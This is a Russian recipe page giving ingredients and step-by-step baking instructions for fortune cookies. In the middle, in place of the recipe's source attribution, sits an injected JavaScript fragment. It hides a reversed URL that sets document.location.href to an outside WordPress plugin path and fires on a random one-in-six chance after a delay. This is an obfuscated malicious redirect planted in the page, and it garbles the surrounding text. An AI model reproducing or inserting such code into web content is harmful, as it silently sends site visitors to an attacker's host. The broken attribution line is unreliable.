Как приготовить самый интригующий десерт на свете. (Если что, это очень просто.)
Выпекайте печенье по одному-двум: остывает и твердеет оно очень быстро. Для его приготовления вам понадобятся: стакан, форма для маффинов или парочка кружек, а также сами бумажки с предсказаниями и ещё несколько продуктов. Каких — написано чуть ниже.
Печенье с предсказаниями
Фото: marthastewart.com
Рецепт дня: печенье с предсказаниями
СЛОЖНОСТЬ РЕЦЕПТА:
ВРЕМЯ ПРИГОТОВЛЕНИЯ:
1 ЧАС 30 МИНУТ
КОЛИЧЕСТВО ПОРЦИЙ:
15
КАЛОРИЙНОСТЬ:
135
135 calories
Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru
PT1H
PT1H
Ингредиенты
яичный белок
4 шт.
сахар
200 г
пшеничная мука
140 г
соль
щепотка
растопленное сливочное масло
5 ст. л.
сливки
3 ст. л.
- Разогрейте духовку до 200 градусов. Застелите противень бумагой для выпечки.
- Смешайте в миске белок и сахар, взбивайте смесь миксером 30 секунд. Добавьте муку и соль и хорошо перемешайте. Затем влейте масло и сливки и взбивайте тесто ещё полминуты.
- Зачерпните тесто столовой ложкой и налейте на бумагу. Выгнутой стороной ложки сформируйте из теста круг диаметром около пяти сантиметров. Если вы делаете печенье впервые, готовьте его по одной штуке.
- Поставьте противень в духовку на 6—7 минут, пока края теста не подрумянятся.
- Поставьте перед собой стакан, форму для выпечки маффинов и подготовьте предсказания-начинку. Как только печенье начнёт зарумяниваться, достаньте противень из духовки, силиконовой лопаткой подденьте край печенья и сложите его пополам, но не заглаживайте уголок. Аккуратно поместите внутрь (через боковое отверстие) бумажку с предсказанием. Затем положите печенье на край стакана сгибом вниз. Надавите слегка на печенье и опустите его края, зафиксируйте в таком положении на десять секунд. Затем аккуратно положите в форму для маффинов — оно застынет и закрепит нужную форму.
- Повторите процедуру с оставшимся тестом и предсказаниями-начинкой.